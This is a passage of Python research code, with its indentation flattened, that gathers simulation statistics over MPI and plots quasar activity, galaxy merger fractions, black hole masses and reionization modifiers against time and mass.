N_gal_halo_array.append([])
N_gal_array.append([])
merger_counts_halo_array.append([])
merger_counts_galaxy_array.append([])
bin_middle_halo_array.append([])
bin_middle_galaxy_array.append([])
box_factor = (LastFile[model_number] - FirstFile[model_number] + 1.0)/(NumFile[model_number]) # This factor allows us to take a sub-volume of the box and scale the results to represent the entire box.
print("We are plotting the quasar density using {0:.4f} of the box's volume.".format(box_factor))
norm = pow(AllVars.BoxSize,3) / pow(AllVars.Hubble_h, 3) * box_factor
####
## We perform the plotting on Rank 0 so only this rank requires the final counts array. ##
if rank == 0:
quasars_total = np.zeros_like((N_quasars_z[model_number]))
boost_total = np.zeros_like(N_quasars_boost_z[model_number])
gal_count_total = np.zeros_like(N_gal_z[model_number])
else:
quasars_total = None
boost_total = None
gal_count_total = None
N_quasars_tmp = np.array((N_quasars_z[model_number])) # So we can use MPI.Reduce()
comm.Reduce([N_quasars_tmp, MPI.DOUBLE], [quasars_total, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the number of quasars and passes back to rank 0.
N_quasars_boost_tmp = np.array(N_quasars_boost_z[model_number]) # So we can use MPI.Reduce()
comm.Reduce([N_quasars_boost_tmp, MPI.DOUBLE], [boost_total, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the number of galaxies that had their fesc boosted.
N_gal_tmp = np.array(N_gal_z[model_number]) # So we can use MPI.Reduce()
comm.Reduce([N_gal_tmp, MPI.DOUBLE], [gal_count_total, MPI.DOUBLE], op = MPI.SUM, root = 0) # Sum the number of total galaxies.
for snapshot_idx in range(len(SnapList[model_number])):
mean_quasar_activity_array[model_number], std_quasar_activity_array[model_number], N_quasar_activity_array[model_number] = calculate_pooled_stats(mean_quasar_activity_array[model_number], std_quasar_activity_array[model_number], N_quasar_activity_array[model_number], mean_quasar_activity[model_number][snapshot_idx], std_quasar_activity[model_number][snapshot_idx], N_halo[model_number][snapshot_idx])
if rank == 0:
merger_count_halo_total = np.zeros_like((N_merger_halo[model_number][snapshot_idx]))
N_gal_halo_total = np.zeros_like((N_halo[model_number][snapshot_idx]))
merger_count_galaxy_total = np.zeros_like((N_merger_galaxy[model_number][snapshot_idx]))
N_gal_total = np.zeros_like((N_gal[model_number][snapshot_idx]))
else:
merger_count_halo_total = None
N_gal_halo_total = None
merger_count_galaxy_total = None
N_gal_total = None
comm.Reduce([N_merger_halo[model_number][snapshot_idx], MPI.FLOAT], [merger_count_halo_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum all the stellar mass and pass to Rank 0.
comm.Reduce([N_halo[model_number][snapshot_idx], MPI.FLOAT], [N_gal_halo_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum all the stellar mass and pass to Rank 0.
comm.Reduce([N_merger_galaxy[model_number][snapshot_idx], MPI.FLOAT], [merger_count_galaxy_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum all the stellar mass and pass to Rank 0.
comm.Reduce([N_gal[model_number][snapshot_idx], MPI.FLOAT], [N_gal_total, MPI.FLOAT], op = MPI.SUM, root = 0) # Sum all the stellar mass and pass to Rank 0.
if rank == 0:
merger_counts_halo_array[model_number].append(merger_count_halo_total)
N_gal_halo_array[model_number].append(N_gal_halo_total)
merger_counts_galaxy_array[model_number].append(merger_count_galaxy_total)
N_gal_array[model_number].append(N_gal_total)
bin_middle_halo_array[model_number].append(np.arange(m_low, m_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
bin_middle_galaxy_array[model_number].append(np.arange(m_gal_low, m_gal_high+bin_width, bin_width)[:-1] + bin_width * 0.5)
if rank == 0:
plot_count = 0
stop_plot = 0
title = model_tags[model_number]
t = np.empty(len(SnapList[model_number]))
ZZ = np.empty(len(SnapList[model_number]))
for snapshot_idx in range(0, len(SnapList[model_number])):
t[snapshot_idx] = (AllVars.t_BigBang - AllVars.Lookback_Time[SnapList[model_number][snapshot_idx]]) * 1.0e3
ZZ[snapshot_idx] = AllVars.SnapZ[SnapList[model_number][snapshot_idx]]
if (stop_plot == 0):
# print("Snapshot {0} PlotSnapshot "
#"{1}".format(SnapList[model_number][snapshot_idx], PlotList[model_number][plot_count]))
if (SnapList[model_number][snapshot_idx] == PlotList[model_number][plot_count]):
label = "z = {0:.2f}".format(AllVars.SnapZ[PlotList[model_number][plot_count]])
ax7.plot(bin_middle_halo_array[model_number][snapshot_idx], mean_quasar_activity_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
#ax50.plot(bin_middle_halo_array[model_number][snapshot_idx], merger_counts_array[model_number][snapshot_idx] / gal_count_total[snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
ax50.plot(bin_middle_halo_array[model_number][snapshot_idx], merger_counts_halo_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
#ax50.plot(bin_middle_halo_array[model_number][snapshot_idx], merger_counts_array[model_number][snapshot_idx] / N_gal_halo_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
#ax55.plot(bin_middle_galaxy_array[model_number][snapshot_idx], merger_counts_galaxy_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
ax55.plot(bin_middle_galaxy_array[model_number][snapshot_idx],
merger_counts_galaxy_array[model_number][snapshot_idx] / N_gal_array[model_number][snapshot_idx], color = PlotScripts.colors[plot_count], linestyle = PlotScripts.linestyles[model_number], rasterized = True, label = label, linewidth = PlotScripts.global_linewidth)
print("plot_count = {0} len(PlotList) = {1}".format(plot_count,
len(PlotList[model_number])))
plot_count += 1
print("plot_count = {0} len(PlotList) = {1}".format(plot_count,
len(PlotList[model_number])))
if (plot_count == len(PlotList[model_number])):
stop_plot = 1
print("For Snapshot {0} at t {3} there were {1} total mergers compared to {2} total galaxies.".format(snapshot_idx, np.sum(merger_counts_galaxy_array[model_number][snapshot_idx]), np.sum(gal_count_total[snapshot_idx]), t[snapshot_idx]))
if (np.sum(gal_count_total[snapshot_idx]) > 0.0 and np.sum(merger_counts_galaxy_array[model_number][snapshot_idx]) > 0.0):
ax56.scatter(t[snapshot_idx], np.sum(merger_counts_galaxy_array[model_number][snapshot_idx]) / np.sum(gal_count_total[snapshot_idx]), color = 'r', rasterized = True)
#ax56.scatter(t[snapshot_idx], quasars_total[snapshot_idx] / np.sum(gal_count_total[snapshot_idx]), color = 'r', rasterized = True)
ax1.plot(t, quasars_total / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[0], rasterized = True, linewidth = PlotScripts.global_linewidth)
p = np.where((ZZ < 15))[0]
#ax1.plot(ZZ[p], quasars_total[p] / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[0], rasterized = True, linewidth = PlotScripts.global_linewidth)
ax3.plot(t, boost_total, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[0], rasterized = True, label = title, linewidth = PlotScripts.global_linewidth)
w = np.where((gal_count_total > 0.0))[0] # Since we're doing a division, need to only plot those redshifts that actually have galaxies.
ax5.plot(t[w], np.divide(boost_total[w], gal_count_total[w]), color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[1], rasterized = True, linewidth = PlotScripts.global_linewidth)
ax6.plot(t[w], gal_count_total[w] / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[1], rasterized = True, linewidth = PlotScripts.global_linewidth)
#ax6.plot(ZZ[p], gal_count_total[p] / norm, color = PlotScripts.colors[model_number], linestyle = PlotScripts.linestyles[1], rasterized = True, linewidth = PlotScripts.global_linewidth)
ax1.plot(np.nan, np.nan, color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[0], label = "Quasar Ejection Density")
ax1.plot(np.nan, np.nan, color = PlotScripts.colors[0], linestyle = PlotScripts.linestyles[1], label = "Galaxy Density")
ax3.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[0], label = "Count")
ax3.plot(np.nan, np.nan, color = 'k', linestyle = PlotScripts.linestyles[1], label = "Fraction of Galaxies")
ax7.set_xlabel(r'$\log_{10}\ M_\mathrm{vir}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax7.set_ylabel(r'$\mathrm{Mean \: Quasar \: Activity}$', size = PlotScripts.global_fontsize)
ax50.set_xlabel(r'$\log_{10}\ M_\mathrm{vir}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
#ax50.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
ax50.set_ylabel(r'$\mathrm{Number \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
ax55.set_xlabel(r'$\log_{10}\ M_\mathrm{*}\ [M_{\odot}]$', size = PlotScripts.global_fontsize)
ax55.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
#ax55.set_ylabel(r'$\mathrm{Number \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
ax56.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_labelsize)
ax56.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Undergoing \: Merger}$', size = PlotScripts.global_fontsize)
#ax56.set_ylabel(r'$\mathrm{Fraction \: Galaxies \: Quasar \: Activity}$', size = PlotScripts.global_fontsize)
ax56.set_yscale('log', nonposy='clip')
ax50.axvline(np.log10(32.0*AllVars.PartMass / AllVars.Hubble_h), color = 'k', linewidth = PlotScripts.global_linewidth, linestyle = '-.')
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(PlotScripts.time_tickinterval))
ax1.set_xlim(PlotScripts.time_xlim)
ax1.set_yscale('log', nonposy='clip')
ax3.xaxis.set_minor_locator(mtick.MultipleLocator(PlotScripts.time_tickinterval))
ax3.set_xlim(PlotScripts.time_xlim)
ax3.set_yscale('log', nonposy='clip')
## Create a second axis at the top that contains the corresponding redshifts. ##
## The redshift defined in the variable 'z_plot' will be displayed. ##
ax2 = ax1.twiny()
ax4 = ax3.twiny()
ax57 = ax56.twiny()
t_plot = (AllVars.t_BigBang - AllVars.cosmo.lookback_time(PlotScripts.z_plot).value) * 1.0e3 # Corresponding time values on the bottom.
z_labels = ["$%d$" % x for x in PlotScripts.z_plot] # Properly Latex-ize the labels.
ax2.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax2.set_xlim(PlotScripts.time_xlim)
ax2.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax2.set_xticklabels(z_labels) # But label them as redshifts.
ax4.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax4.set_xlim(PlotScripts.time_xlim)
ax4.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax4.set_xticklabels(z_labels) # But label them as redshifts.
ax57.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax57.set_xlim(PlotScripts.time_xlim)
ax57.set_xticks(t_plot) # Set the ticks according to the time values on the bottom,
ax57.set_xticklabels(z_labels) # But label them as redshifts.
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_labelsize)
#ax1.set_xlabel(r"$z$", size = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$N_\mathrm{Quasars} \: [\mathrm{Mpc}^{-3}]$', fontsize = PlotScripts.global_fontsize)
ax6.set_ylabel(r'$N_\mathrm{Gal} \: [\mathrm{Mpc}^{-3}]$', fontsize = PlotScripts.global_fontsize)
ax3.set_xlabel(r"$\mathrm{Time \: Since \: Big \: Bang \: [Myr]}$", size = PlotScripts.global_labelsize)
ax3.set_ylabel(r'$N_\mathrm{Boosted}$', fontsize = PlotScripts.global_fontsize)
ax5.set_ylabel(r'$\mathrm{Fraction \: Boosted}$', fontsize = PlotScripts.global_fontsize)
leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax3.legend(loc='lower left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax7.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax50.legend(loc='upper right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax55.legend(loc='upper right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
fig.tight_layout()
fig2.tight_layout()
fig3.tight_layout()
fig5.tight_layout()
fig6.tight_layout()
outputFile1 = './{0}_quasardensity{1}'.format(output_tag, output_format)
outputFile2 = './{0}_boostedcount{1}'.format(output_tag, output_format)
outputFile3 = './{0}_quasar_activity_halo{1}'.format(output_tag, output_format)
outputFile4 = './{0}_mergercount_global{1}'.format(output_tag, output_format)
outputFile5 = './{0}_mergercount_global_stellarmass{1}'.format(output_tag, output_format)
outputFile6 = './{0}_mergercount_total{1}'.format(output_tag, output_format)
fig.savefig(outputFile1) # Save the figure
fig2.savefig(outputFile2) # Save the figure
fig3.savefig(outputFile3) # Save the figure
fig4.savefig(outputFile4) # Save the figure
fig5.savefig(outputFile5) # Save the figure
fig6.savefig(outputFile6) # Save the figure
print("Saved to {0}".format(outputFile1))
print("Saved to {0}".format(outputFile2))
print("Saved to {0}".format(outputFile3))
print("Saved to {0}".format(outputFile4))
print("Saved to {0}".format(outputFile5))
print("Saved to {0}".format(outputFile6))
plt.close(fig)
plt.close(fig2)
plt.close(fig3)
##
def plot_photon_quasar_fraction(snapshot, filenr, output_tag, QuasarFractionalPhoton, QuasarActivityToggle, NumSubsteps):
ax1 = plt.subplot(111)
counts, bin_edges, bin_middle = AllVars.Calculate_Histogram(QuasarFractionalPhoton, 0.05, 0, 0, 1)
ax1.plot(bin_middle, counts, lw = PlotScripts.global_linewidth, color = 'r')
ax1.axvline(np.mean(QuasarFractionalPhoton[QuasarFractionalPhoton != 0]), lw = 0.5, ls = '-')
ax1.set_yscale('log', nonposy='clip')
ax1.set_xlabel(r"$\mathrm{Fractional \: Photon \: Boost}$")
ax1.set_ylabel(r"$\mathrm{Count}$")
ax1.set_ylim([1e1, 1e5])
outputFile1 = './photonfraction/file{0}_snap{1}_{2}{3}'.format(filenr, snapshot, output_tag, output_format)
plt.tight_layout()
plt.savefig(outputFile1)
print("Saved to {0}".format(outputFile1))
plt.close()
###
def plot_quasar_substep(snapshot, filenr, output_tag, substep):
ax1 = plt.subplot(111)
counts, bin_edges, bin_middle = AllVars.Calculate_Histogram(substep, 0.1, 0, 0, 10)
ax1.plot(bin_middle, counts, lw = PlotScripts.global_linewidth, color = 'r')
ax1.axvline(np.mean(substep[substep != -1]), lw = 0.5, ls = '-')
ax1.set_yscale('log', nonposy='clip')
ax1.set_xlabel(r"$\mathrm{Substep \: Quasar \: Activity}$")
ax1.set_ylabel(r"$\mathrm{Count}$")
# ax1.set_ylim([1e1, 1e5])
outputFile1 = './substep_activity/file{0}_snap{1}_{2}{3}'.format(filenr, snapshot, output_tag, output_format)
plt.tight_layout()
plt.savefig(outputFile1)
print("Saved to {0}".format(outputFile1))
plt.close()
###
def plot_post_quasar_SFR(PlotSnapList, model_number, Gal, output_tag):
ax1 = plt.subplot(111)
ax2 = ax1.twinx()
count = 0
snapshot_thickness = 20 # How many snapshots before/after the quasar event do we want to track?
for snapshot_idx in PlotSnapList[model_number]:
w = np.where((G.QuasarActivity[:, snapshot_idx] == 1) & (G.LenHistory[:, snapshot_idx] > 200.0) & (G.GridStellarMass[:, snapshot_idx] > 0.001))[0]
w_slice_gridhistory = G.GridHistory[w,snapshot_idx-snapshot_thickness:snapshot_idx+snapshot_thickness]
potential_gal = []
for i in range(len(w_slice_gridhistory)):
ww = np.where((w_slice_gridhistory[i] >= 0))[0]
if (len(ww) == snapshot_thickness * 2):
potential_gal.append(w[i])
if (len(potential_gal) == 0):
return
count += 1
print("There were {0} galaxies that had an energetic quasar wind event at snapshot {1} (z = {2:.3f})".format(len(potential_gal), snapshot_idx, AllVars.SnapZ[snapshot_idx]))
chosen_gal = potential_gal[1]
lenhistory_array = np.empty((int(snapshot_thickness*2 + 1)))
SFR_array = np.empty((int(snapshot_thickness*2 + 1)))
gridhistory_array = np.empty((int(snapshot_thickness*2 + 1)))
coldgas_array = np.empty((int(snapshot_thickness*2 + 1)))
t = np.empty((int(snapshot_thickness*2 + 1)))
for i in range(-snapshot_thickness, snapshot_thickness+1):
#print("SFR {0} {1}".format(snapshot_idx + i, G.GridSFR[chosen_gal, snapshot_idx+i]))
#print("ColdGas {0} {1}".format(snapshot_idx + i, G.GridColdGas[chosen_gal, snapshot_idx+i]))
lenhistory_array[i+snapshot_thickness] = (G.LenHistory[chosen_gal, snapshot_idx+i])
SFR_array[i+snapshot_thickness] = (G.GridSFR[chosen_gal, snapshot_idx+i]) #- (G.GridSFR[chosen_gal, snapshot_idx])
gridhistory_array[i+snapshot_thickness] = (G.GridHistory[chosen_gal, snapshot_idx+i])
coldgas_array[i+snapshot_thickness] = (G.GridColdGas[chosen_gal, snapshot_idx+i] * 1.0e10 / AllVars.Hubble_h) #- (G.GridColdGas[chosen_gal, snapshot_idx])
t[i+snapshot_thickness] = (-AllVars.Lookback_Time[snapshot_idx+i] + AllVars.Lookback_Time[snapshot_idx]) * 1.0e3
print("Len History {0}".format(lenhistory_array))
print("Grid History {0}".format(gridhistory_array))
print("Cold Gas {0}".format(coldgas_array))
print("SFR {0}".format(SFR_array))
stellarmass_text = r"$log M_* = {0:.2f} \: M_\odot$".format(np.log10(G.GridStellarMass[chosen_gal, snapshot_idx] * 1.0e10 / AllVars.Hubble_h))
Ndym_text = "Dynamical Time = {0:.2f} Myr".format(G.DynamicalTime[chosen_gal, snapshot_idx])
z_text = "z = {0:.2f}".format(AllVars.SnapZ[snapshot_idx])
ax1.text(0.05, 0.95, z_text, transform = ax1.transAxes, fontsize = PlotScripts.global_fontsize - 4)
ax1.text(0.05, 0.9, stellarmass_text, transform = ax1.transAxes, fontsize = PlotScripts.global_fontsize - 4)
ax1.text(0.05, 0.85, Ndym_text, transform = ax1.transAxes, fontsize = PlotScripts.global_fontsize - 4)
ax1.plot(t, SFR_array, color = 'r', lw = PlotScripts.global_linewidth)
ax2.plot(t, coldgas_array, color = 'b', lw = PlotScripts.global_linewidth)
ax1.set_xlabel(r"$\mathrm{Time \: Since \: Quasar \: Event \: [Myr]}$", size = PlotScripts.global_labelsize - 10)
# ax1.set_ylabel(r"$\mathrm{Fractional \: SFR \: Relative \: To \: SFR_{Quasar}}$", size = PlotScripts.global_labelsize - 10)
# ax2.set_ylabel(r"$\mathrm{Difference \: Cold \: Gas \: Mass \: Relative \: To \: Cold_{Quasar}}$", size = PlotScripts.global_labelsize - 10)
ax1.set_ylabel(r"$\mathrm{SFR} \: [\mathrm{M}_\odot \mathrm{yr}^{-1}]$", size = PlotScripts.global_labelsize - 10)
ax2.set_ylabel(r"$\mathrm{Cold \: Gas \: Mass \: [\mathrm{M}_\odot]}$",size = PlotScripts.global_labelsize - 10)
ax1.set_yscale('log', nonposy='clip')
ax2.set_yscale('log', nonposy='clip')
ax1.plot(np.nan, np.nan, color = 'r', label = r"$\mathrm{SFR}$")
ax1.plot(np.nan, np.nan, color = 'b', label = r"$\mathrm{Cold \: Gas}$")
leg = ax1.legend(loc='upper right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = "{0}_galaxy{2}{1}".format(output_tag, output_format, chosen_gal)
plt.tight_layout()
plt.savefig(outputFile)
print("Saved to {0}".format(outputFile))
plt.close()
exit()
###
def plot_stellarmass_blackhole(SnapList, simulation_norm, mean_galaxy_BHmass,
std_galaxy_BHmass, N_galaxy_BHmass, FirstFile,
LastFile, NumFile, model_tags, output_tag):
master_mean_SMBH, master_std_SMBH, master_N, master_bin_middle = \
collect_across_tasks(mean_galaxy_BHmass, std_galaxy_BHmass,
N_galaxy_BHmass, SnapList, SnapList, True,
m_gal_low, m_gal_high)
if rank == 0:
fig = plt.figure()
ax1 = fig.add_subplot(111)
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
for model_number in range(0, len(SnapList)):
## Normalization for each model. ##
if (simulation_norm[model_number] == 0):
AllVars.Set_Params_Mysim()
elif (simulation_norm[model_number] == 1):
AllVars.Set_Params_MiniMill()
elif (simulation_norm[model_number] == 2):
AllVars.Set_Params_Tiamat()
elif (simulation_norm[model_number] == 3):
AllVars.Set_Params_Tiamat_extended()
elif (simulation_norm[model_number] == 4):
AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
AllVars.Set_Params_Kali()
box_factor = (LastFile[model_number] - FirstFile[model_number] + 1.0)/(NumFile[model_number]) # This factor allows us to take a sub-volume of the box and scale the results to represent the entire box.
norm = pow(AllVars.BoxSize,3) / pow(AllVars.Hubble_h, 3) * bin_width * box_factor
for snapshot_idx in range(0, len(SnapList[model_number])):
w = np.where((master_N[model_number][snapshot_idx] > 0.0))[0]
mean = np.log10(master_mean_SMBH[model_number][snapshot_idx][w])
upper = np.log10(np.add(master_mean_SMBH[model_number][snapshot_idx][w],
master_std_SMBH[model_number][snapshot_idx][w]))
lower = np.log10(np.subtract(master_mean_SMBH[model_number][snapshot_idx][w],
master_std_SMBH[model_number][snapshot_idx][w]))
label = "z = {0:.2f}" \
.format(AllVars.SnapZ[SnapList[model_number][snapshot_idx]])
ax1.plot(master_bin_middle[model_number][snapshot_idx][w],
mean, label = label, color = PlotScripts.colors[snapshot_idx],
ls = PlotScripts.linestyles[model_number],
lw = PlotScripts.global_linewidth, rasterized = True)
#ax1.fill_between(bin_middle_stellar_array[model_number][snapshot_idx][w], lower, upper, color = PlotScripts.colors[model_number], alpha = 0.25)
ax2.plot(master_bin_middle[model_number][snapshot_idx][w],
master_N[model_number][snapshot_idx][w] / norm,
label = label, ls = PlotScripts.linestyles[model_number],
lw = PlotScripts.global_linewidth, rasterized = True)
Obs.Get_Data_SMBH()
PlotScripts.plot_SMBH_z8(ax1)
ax1.set_xlabel(r"$\log_{10}\mathrm{M}_* [\mathrm{M}_\odot]$", size = PlotScripts.global_fontsize)
ax1.set_ylabel(r"$\log_{10}\mathrm{M}_\mathrm{BH} [\mathrm{M}_\odot]$", size = PlotScripts.global_fontsize)
ax2.set_xlabel(r"$\log_{10}\mathrm{M}_\mathrm{BH} [\mathrm{M}_\odot]$", size = PlotScripts.global_fontsize)
ax2.set_ylabel(r'$\Phi\ [\mathrm{Mpc}^{-3}\: \mathrm{dex}^{-1}]$', fontsize = PlotScripts.global_fontsize)
ax2.set_yscale('log', nonposy='clip')
ax1.set_xticks(np.arange(7.0, 12.0))
ax1.set_yticks(np.arange(3.0, 12.0))
ax1.xaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax1.yaxis.set_minor_locator(mtick.MultipleLocator(0.25))
ax1.set_xlim([7.0, 10.25])
ax1.set_ylim([3.0, 8.0])
leg = ax1.legend(loc='upper left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
leg = ax2.legend(loc='lower left', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile = "{0}{1}".format(output_tag, output_format)
plt.tight_layout()
fig.savefig(outputFile)
print("Saved to {0}".format(outputFile))
plt.close(fig)
outputFile2 = "{0}_MF{1}".format(output_tag, output_format)
plt.tight_layout()
fig2.savefig(outputFile2)
print("Saved to {0}".format(outputFile2))
plt.close(fig2)
###
def plot_reionmod(PlotSnapList, SnapList, simulation_norm, mean_reionmod_halo,
std_reionmod_halo, N_halo, mean_reionmod_z, std_reionmod_z,
N_reionmod, plot_z, model_tags, output_tag):
"""
Plot the reionization modifier as a function of halo mass and redshift.
Parameters
----------
PlotSnapList, SnapList: 2D Nested arrays of integers. Outer length is equal to the number of models and inner length is number of snapshots we're plotting/calculated for.
PlotSnapList contains the snapshots for each model we will plot for the halo mass figure.
SnapList contains the snapshots for each model that we have performed calculations for. These aren't equal because we don't want to plot halo curves for ALL redshifts.
simulation_norm: Array of integers. Length is equal to the number of models.
Contains the simulation identifier for each model. Used to set the parameters of each model.
mean_reionmod_halo, std_reionmod_halo: 3D Nested arrays of floats. Most outer length is equal to the number of models, next length is number of snapshots for each model, then inner-most length is the number of halo mass- bins (given by NB).
Contains the mean/standard deviation values for the reionization modifier as a function of halo mass.
NOTE: These are unique for each task.
N_halo: 3D Nested arrays of floats. Lengths are identical to mean_reionmod_halo.
Contains the number of halos in each halo mass bin.
NOTE: These are unique for each task.
mean_reionmod_z, std_reionmod_z: 2D Nested arrays of floats. Outer length is equal to the number of models, inner length is the number of snapshots for each model. NOTE: This inner length can be different to the length of PlotSnapList as we don't necessarily need to plot for every snapshot we calculate.
Contains the mean/standard deviation values for the rieonization modifier as a function of redshift.
NOTE: These are unique for each task.
N_reionmod: 2D Nested arrays of floats. Lengths are identical to mean_reionmod_z.
Contains the number of galaxies at each redshift that have non-negative reionization modifier. A negative reionization modifier is a galaxy who didn't have infall/stripping during the snapshot.
NOTE: These are unique for each task.
plot_z: Boolean.
Denotes whether we want to plot the reionization modifier as a function
of redshift. Useful because we often only calculate statistics for a
subset of the snapshots to decrease computation time. For these runs,
we don't want to plot for something that requires ALL snapshots.
model_tags: Array of strings. Length is equal to the number of models.
Contains the legend labels for each model.
output_tag: String.
The prefix for the output file.
Returns
----------
None. Plot is saved in current directory as "./<output_tag>.<output_format>"
"""
master_mean_reionmod_halo, master_std_reionmod_halo,
master_N_reionmod_halo, master_bin_middle = collect_across_tasks(mean_reionmod_halo,
std_reionmod_halo,
N_halo, SnapList,
PlotSnapList, True,
m_low, m_high)
if plot_z:
master_mean_reionmod_z, master_std_reionmod_z, master_N_reionmod_z, _ = collect_across_tasks(mean_reionmod_z,
std_reionmod_z,
N_reionmod)
if rank == 0:
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
if plot_z:
fig2 = plt.figure()
ax10 = fig2.add_subplot(111)
for model_number in range(len(PlotSnapList)):
if(simulation_norm[model_number] == 1):
cosmo = AllVars.Set_Params_MiniMill()
elif(simulation_norm[model_number] == 3):
cosmo = AllVars.Set_Params_Tiamat_extended()
elif(simulation_norm[model_number] == 4):
cosmo = AllVars.Set_Params_Britton()
elif(simulation_norm[model_number] == 5):
cosmo = AllVars.Set_Params_Kali()
for snapshot_idx in range(len((PlotSnapList[model_number]))):
if snapshot_idx == 0:
label = model_tags[model_number]
else:
label = ""
nonzero_bins = np.where(master_N_reionmod_halo[model_number][snapshot_idx] > 0.0)[0]
ax1.plot(master_bin_middle[model_number][snapshot_idx][nonzero_bins],
master_mean_reionmod_halo[model_number][snapshot_idx][nonzero_bins],
label = label, ls = PlotScripts.linestyles[model_number],
color = PlotScripts.colors[snapshot_idx])
if plot_z:
ax10.plot((AllVars.t_BigBang - AllVars.Lookback_Time[SnapList[model_number]])*1.0e3, master_mean_reionmod_z[model_number], color = PlotScripts.colors[model_number], label = model_tags[model_number], ls = PlotScripts.linestyles[model_number], lw = 3)
for count, snapshot_idx in enumerate(PlotSnapList[model_number]):
#label = r"$\mathbf{z = " + str(int(round(AllVars.SnapZ[snapshot_idx]))) + "}$"
label = r"$\mathbf{z = " + str(AllVars.SnapZ[snapshot_idx]) + "}$"
ax1.plot(np.nan, np.nan, ls = PlotScripts.linestyles[0], color =
PlotScripts.colors[count], label = label)
ax1.set_xlim([8.5, 11.5])
ax1.set_ylim([0.0, 1.05])
ax1.set_xlabel(r'$\mathbf{log_{10} \: M_{vir} \:[M_{\odot}]}$', fontsize = PlotScripts.global_labelsize)
ax1.set_ylabel(r'$\mathbf{Mean ReionMod}$', fontsize = PlotScripts.global_labelsize)
leg = ax1.legend(loc='lower right', numpoints=1, labelspacing=0.1)
leg.draw_frame(False) # Don't want a box frame
for t in leg.get_texts(): # Reduce the size of the text
t.set_fontsize(PlotScripts.global_legendsize)
outputFile1 = "./{0}_halo{1}".format(output_tag, output_format)
fig1.savefig(outputFile1, bbox_inches='tight') # Save the figure
print('Saved file to {0}'.format(outputFile1))
plt.close(fig1)
if plot_z:
ax10.set_xlabel(r"$\mathbf{Time \: since \: Big \: Bang \: [Myr]}$", fontsize = PlotScripts.global_labelsize)
tick_locs = np.arange(200.0, 1000.0, 100.0)
tick_labels = [r"$\mathbf{%d}$" % x for x in tick_locs]
ax10.xaxis.set_major_locator(mtick.MultipleLocator(100))
ax10.set_xticklabels(tick_labels, fontsize = PlotScripts.global_fontsize)
ax10.set_xlim(PlotScripts.time_xlim)
ax10.set_ylabel(r'$\mathbf{Mean ReionMod}$', fontsize = PlotScripts.global_labelsize)
ax11 = ax10.twiny()
